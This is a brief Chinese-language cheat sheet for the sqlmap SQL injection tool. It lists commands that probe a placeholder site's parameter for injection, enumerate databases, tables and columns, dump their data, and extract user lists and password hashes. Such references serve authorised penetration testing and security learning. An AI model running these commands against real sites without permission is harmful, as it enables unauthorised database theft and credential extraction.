sqlmap

2023-07-30 17:20:20 浏览数 (1)

GitHub:https://github.com/sqlmapproject/sqlmap

基础命令:

代码语言:javascript复制
#  扫描id是否存在注入点
sqlmap -u https://aaa.com/?id=1

#  添加cookie
sqlmap -u https://aaa.com/?id=1 --cookie="cookie"

#  post传参
sqlmap -u https://aaa.com/?id=1 --data="name=admin&password=123456"

#  用请求包进行注入,http.txt是抓取的请求包
sqlmap -r http.txt 

数据库:

代码语言:javascript复制
#  查看所有数据库
sqlmap -u https://aaa.com/?id=1 --dbs

#  查看当前数据库
sqlmap -u https://aaa.com/?id=1 --current-db

数据表:

代码语言:javascript复制
#  爆表(已知数据库)
sqlmap -u https://aaa.com/?id=1 -D database_name --tables

#  爆列(已知数据库,表名)
sqlmap -u https://aaa.com/?id=1 -D database_name -T table_name --columns

#  爆列数据(已知数据库,表名,列名)
sqlmap -u https://aaa.com/?id=1 -D database_name -T table_name -C column_name --dump

#  爆出(数据库/表/....)所有数据
sqlmap -u https://aaa.com/?id=1 --dump-all
sqlmap -u https://aaa.com/?id=1 -D database_name --dump-all

用户:

代码语言:javascript复制
#  查看所有用户
sqlmap -u https://aaa.com/?id=1 --users

#  查看所有用户密码
sqlmap -u https://aaa.com/?id=1 --passwords

#  查看当前用户
sqlmap -u https://aaa.com/?id=1 --current-user

#  查看当前用户是否有管理员权限
sqlmap -u https://aaa.com/?id=1 --is-dba

#  列出所有管理员
sqlmap -u https://aaa.com/?id=1 --roles

其他参数:

代码语言:javascript复制
#  设置注入点
-p
#  已知id参数存在漏洞
-p id

#  设置从哪开始
--start
#  从第2条数据开始
--start 2

#  设置从哪结束
--stop
#  到第50条数据结束
--stop 50

#  设置数据库
--dbms
#  设置数据库为mysql
--dbms="MySQL"

#  设置探测等级(1-5),当level=2时,会测试cookie注入,当level=3时,会测试user-agent/referer注入
--level
#  设置探测等级为3
--level=3

#  设置危险等级(1-3)
--risk
#  设置危险等级为2
--risk=2

0 人点赞